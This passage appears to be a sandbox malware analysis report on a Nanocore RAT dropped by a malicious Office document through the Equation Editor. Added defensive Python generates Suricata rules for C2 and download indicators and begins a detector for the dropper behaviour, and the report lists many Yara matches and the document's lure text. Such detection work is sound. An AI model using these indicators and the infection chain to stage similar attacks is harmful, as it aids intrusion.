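            f"alert tcp $HOME_NET any -> {ip} {port} "
            f'(msg:"Sandbox IOC: suspected C2 {ip}:{port}"; flow:to_server; sid:{sid}; rev:1;)'
        )
        sid += 1
    for dom in iocs["domains"]:
        rules.append(
            "alert dns $HOME_NET any -> any any "
            f'(msg:"Sandbox IOC: DNS query for {dom}"; dns.query; content:"{dom}"; nocase; sid:{sid}; rev:1;)'
        )
        sid += 1
    for url in iocs["urls"]:
        host, _, path = url.split("://", 1)[1].partition("/")
        rules.append(
            "alert http $HOME_NET any -> any any "
            f'(msg:"Sandbox IOC: download of {url}"; http.host; content:"{host}"; '
            f'http.uri; content:"/{path}"; sid:{sid}; rev:1;)'
        )
        sid += 1
    return rules


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_LINES)
    print(found)
    for rule in to_suricata(found):
        print(rule)
```

        Direct-to-IP traffic with no DNS query is kept as a separate counter because it is a behavioural indicator independent of the address: a workstation connecting to a public IP it never resolved is rarely legitimate, and the repeat count distinguishes a beacon from a one-off. The HTTP request for /HHK.exe is the only download in the trace; block the full URL rather than just the IP, since shared hosting addresses churn.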

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.780000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21b0000.15.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.2300000.19.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8c0000.13.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.790000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8a0000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.780000.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.22f4d80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.361038c.29.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.2254e04.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21b0000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.8b0000.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.375cb0e.30.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ac674.23.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.375cb0e.30.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.21d0000.16.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.24ccef8.21.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING UP TO TRANSLATE LANGUAGE 7 NO. N1ASF6783 8 PURCHASE ORDER 9 10 CLIENT: ZhOu YU
        Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING UP TO TRANSLATE LANGUAGE 7 NO. N1ASF6783 8 PURCHASE ORDER 9 10 CLIENT: ZhOu YU
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ALP.exe
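        The observation above, EQNEDT32.EXE creating ALP.exe under AppData\Roaming, is the detection opportunity: the Equation Editor is a small legacy component that never writes executables and never launches other programs on its own, so both behaviours can be alerted on with very few false positives. The Python below is an added example, not from the report, from Joe Sandbox or from any published Sigma rule: it evaluates constructed Sysmon-style events against those two conditions, generalising the single file drop above to any executable written by, or any process spawned from, EQNEDT32.EXE. Field names follow Sysmon's FileCreate (event 11) and ProcessCreate (event 1) records; the "Header" bytes are an assumed enrichment field that Sysmon itself does not provide.

```python
"""Added example: detection logic for Equation Editor abuse, run over constructed telemetry.

Not part of the Joe Sandbox report. SAMPLE_EVENTS are constructed to look like
Sysmon FileCreate (EventID 11) and ProcessCreate (EventID 1) records; the drop
path is the one observed in the report. 'Header' (first bytes of the created
file) is an assumed enrichment field: an EDR or a post-hoc file read must supply it.
"""
import ntpath

EQNEDT = "eqnedt32.exe"
PE_MAGIC = b"MZ"
EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".pif")
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

SAMPLE_EVENTS = [  # constructed
    {"EventID": 11,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\ALP.exe",
     "Header": b"MZ\x90\x00"},
    {"EventID": 1,
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Users\user\AppData\Roaming\ALP.exe"},
    {"EventID": 11,  # benign control: Excel writing its own temp file
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\~DF1A2B.tmp",
     "Header": b"\xd0\xcf\x11\xe0"},
]


def _is_eqnedt(path):
    # ntpath handles Windows separators regardless of the host the detector runs on.
    return ntpath.basename(path).lower() == EQNEDT


def _looks_executable(target, header):
    # Magic bytes win over extension; fall back to extension when no header was captured.
    return header[:2] == PE_MAGIC or target.lower().endswith(EXEC_EXTS)


def evaluate(events):
    """Return (rule, severity, detail) tuples for every event that matches."""
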